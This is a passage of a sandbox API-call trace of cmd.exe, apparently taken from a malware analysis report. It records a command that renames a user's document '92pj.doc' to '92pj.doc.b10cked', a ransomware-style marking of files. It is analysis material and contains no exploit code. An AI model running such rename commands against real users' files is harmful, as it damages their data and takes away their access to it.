Protect=0x4, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.322] GetConsoleOutputCP () returned 0x1b5 [0136.325] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.325] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.325] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.325] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.330] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.330] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.339] GetEnvironmentStringsW () returned 0x4b01c8* [0136.339] FreeEnvironmentStringsW (penv=0x4b01c8) returned 1 [0136.339] GetEnvironmentStringsW () returned 0x4b01c8* [0136.339] FreeEnvironmentStringsW (penv=0x4b01c8) returned 1 [0136.339] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e934 | out: phkResult=0x30e934*=0x40) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x0, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x1, lpcbData=0x30e938*=0x4) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x1, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x0, lpcbData=0x30e938*=0x4) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x40, lpcbData=0x30e938*=0x4) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x40, lpcbData=0x30e938*=0x4) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x40, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.339] RegCloseKey (hKey=0x40) returned 0x0 [0136.339] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e934 | out: phkResult=0x30e934*=0x40) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x40, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x1, lpcbData=0x30e938*=0x4) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x1, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x0, lpcbData=0x30e938*=0x4) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x9, lpcbData=0x30e938*=0x4) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x9, lpcbData=0x30e938*=0x4) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x9, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.340] RegCloseKey (hKey=0x40) returned 0x0 [0136.340] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.340] srand (_Seed=0x5b88636a) [0136.340] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"" [0136.340] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"" [0136.340] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.340] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b1928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.341] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.341] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.341] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.341] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.341] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.341] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.341] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.341] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.341] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.341] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.341] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.341] GetEnvironmentStringsW () returned 0x4b2318* [0136.341] FreeEnvironmentStringsW (penv=0x4b2318) returned 1 [0136.341] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.341] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.341] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.341] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.341] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.341] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.341] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.341] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.341] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.341] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.342] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.342] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f700, lpFilePart=0x30f6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f6fc*="Desktop") returned 0x18 [0136.342] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.342] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f47c | out: lpFindFileData=0x30f47c) returned 0x4b0058 [0136.342] FindClose (in: hFindFile=0x4b0058 | out: hFindFile=0x4b0058) returned 1 [0136.342] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f47c | out: lpFindFileData=0x30f47c) returned 0x4b0058 [0136.342] FindClose (in: hFindFile=0x4b0058 | out: hFindFile=0x4b0058) returned 1 [0136.342] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f47c | out: lpFindFileData=0x30f47c) returned 0x4b0058 [0136.342] FindClose (in: hFindFile=0x4b0058 | out: hFindFile=0x4b0058) returned 1 [0136.342] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.342] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.343] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.343] GetEnvironmentStringsW () returned 0x4b2b38* [0136.343] FreeEnvironmentStringsW (penv=0x4b2b38) returned 1 [0136.343] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.343] GetConsoleOutputCP () returned 0x1b5 [0136.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.369] GetUserDefaultLCID () returned 0x409 [0136.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f840, cchData=128 | out: lpLCData="0") returned 2 [0136.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f840, cchData=128 | out: lpLCData="0") returned 2 [0136.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f840, cchData=128 | out: lpLCData="1") returned 2 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.373] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.374] GetConsoleTitleW (in: lpConsoleTitle=0x4a0908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.387] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.388] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.388] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.388] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.388] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.388] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.388] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.388] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.388] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.388] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.391] GetConsoleTitleW (in: lpConsoleTitle=0x30f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.431] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.431] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.431] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.431] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.431] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.431] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.431] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.431] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.431] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.431] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.431] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.431] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.431] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.431] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.431] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.431] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.431] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.431] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.431] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.431] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.431] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.431] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.431] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.431] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.431] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.432] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.432] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.432] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.432] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.432] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.433] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.433] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.433] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f2f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f2ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f2ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.434] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.434] _wcsicmp (_String1="92pj.doc", _String2=".") returned 11 [0136.434] _wcsicmp (_String1="92pj.doc", _String2="..") returned 11 [0136.434] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc")) returned 0x20 [0136.435] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4b1ea8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.435] SetErrorMode (uMode=0x0) returned 0x0 [0136.435] SetErrorMode (uMode=0x1) returned 0x0 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", nBufferLength=0x104, lpBuffer=0x30ec7c, lpFilePart=0x30ec64 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", lpFilePart=0x30ec64*="92pj.doc") returned 0x35 [0136.435] SetErrorMode (uMode=0x0) returned 0x1 [0136.435] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t")) returned 0x10 [0136.435] _wcsicmp (_String1="92pj.doc", _String2=".") returned 11 [0136.435] _wcsicmp (_String1="92pj.doc", _String2="..") returned 11 [0136.435] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc")) returned 0x20 [0136.435] SetErrorMode (uMode=0x0) returned 0x0 [0136.435] SetErrorMode (uMode=0x1) returned 0x0 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", nBufferLength=0x104, lpBuffer=0x30f0f8, lpFilePart=0x30ee90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", lpFilePart=0x30ee90*="92pj.doc") returned 0x35 [0136.435] SetErrorMode (uMode=0x0) returned 0x1 [0136.435] SetErrorMode (uMode=0x0) returned 0x0 [0136.435] SetErrorMode (uMode=0x1) returned 0x0 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked", nBufferLength=0x104, lpBuffer=0x30f300, lpFilePart=0x30ee90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked", lpFilePart=0x30ee90*="92pj.doc.b10cked") returned 0x3d [0136.435] SetErrorMode (uMode=0x0) returned 0x1 [0136.435] SetLastError (dwErrCode=0x0) [0136.435] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc.b10cked")) returned 0xffffffff [0136.435] GetLastError () returned 0x2 [0136.435] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", fInfoLevelId=0x1, lpFindFileData=0x30e80c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e80c) returned 0x4a0f08 [0136.436] FindNextFileW (in: hFindFile=0x4a0f08, lpFindFileData=0x30e80c | out: lpFindFileData=0x30e80c) returned 0 [0136.436] GetLastError () returned 0x12 [0136.436] FindClose (in: hFindFile=0x4a0f08 | out: hFindFile=0x4a0f08) returned 1 [0136.437] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", fInfoLevelId=0x1, lpFindFileData=0x4b1c48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b1c48) returned 0x4a0f08 [0136.437] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked", nBufferLength=0x104, lpBuffer=0x30eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked", lpFilePart=0x0) returned 0x3d [0136.437] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", nBufferLength=0x104, lpBuffer=0x30eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", lpFilePart=0x0) returned 0x35 [0136.437] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc")) returned 0x20 [0136.437] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc.b10cked"), dwFlags=0x3) returned 1 [0136.438] FindClose (in: hFindFile=0x4a0f08 | out: hFindFile=0x4a0f08) returned 1 [0136.438] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30ea58 | out: _Buffer=" 1") returned 9 [0136.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.438] GetFileType (hFile=0x7) returned 0x2 [0136.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.461] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30e9e4 | out: lpMode=0x30e9e4) returned 1 [0136.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ea18 | out: lpConsoleScreenBufferInfo=0x30ea18) returned 1 [0136.464] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, 